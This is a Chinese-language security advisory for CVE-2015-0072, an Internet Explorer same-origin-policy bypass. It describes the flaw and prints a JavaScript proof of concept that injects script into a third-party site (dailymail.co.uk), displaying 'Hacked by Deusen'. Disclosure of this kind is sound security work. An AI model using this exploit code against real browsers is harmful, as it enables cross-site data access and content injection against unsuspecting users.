发布日期：2015-02-04
更新日期：2015-02-05

受影响系统：

Microsoft Internet Explorer

描述：

---

BUGTRAQ  ID: 72489
CVE(CAN) ID: CVE-2015-0072

Internet Explorer是微软公司推出的一款网页浏览器。

Microsoft Internet Explorer在实现上存在安全限制绕过漏洞，攻击者可利用此漏洞绕过同源策略及某些访问限制，以访问数据或在受影响应用上下文中执行任意代码。

<*来源：David Leo
  *>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

David Leo （）提供了如下测试方法：
function go()
{
    w=window.frames[0];
    w.setTimeout("alert(eval('x=top.frames[1];r=confirm(\\'Close this window after 3 seconds...\\');x.location=\\'javascript:%22%3Cscript%3Efunction%20a()%7Bw.document.body.innerHTML%3D%27%3Ca%20style%3Dfont-size%3A50px%3EHacked%20by%20Deusen%3C%2Fa%3E%27%3B%7D%20function%20o()%7Bw%3Dwindow.open(%27http%3A%2F%2Fwww.dailymail.co.uk%27%2C%27_blank%27%2C%27top%3D0%2C%20left%3D0%2C%20width%3D800%2C%20height%3D600%2C%20location%3Dyes%2C%20scrollbars%3Dyes%27)%3BsetTimeout(%27a()%27%2C7000)%3B%7D%3C%2Fscript%3E%3Ca%20href%3D%27javascript%3Ao()%3Bvoid(0)%3B%27%3EGo%3C%2Fa%3E%22\\';'))",1);
}
setTimeout("go()",1000);

建议：

---

厂商补丁：

Microsoft
---------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.microsoft.com/windows/ie/default.asp

浏览次数：2793
严重程度：0（网友投票）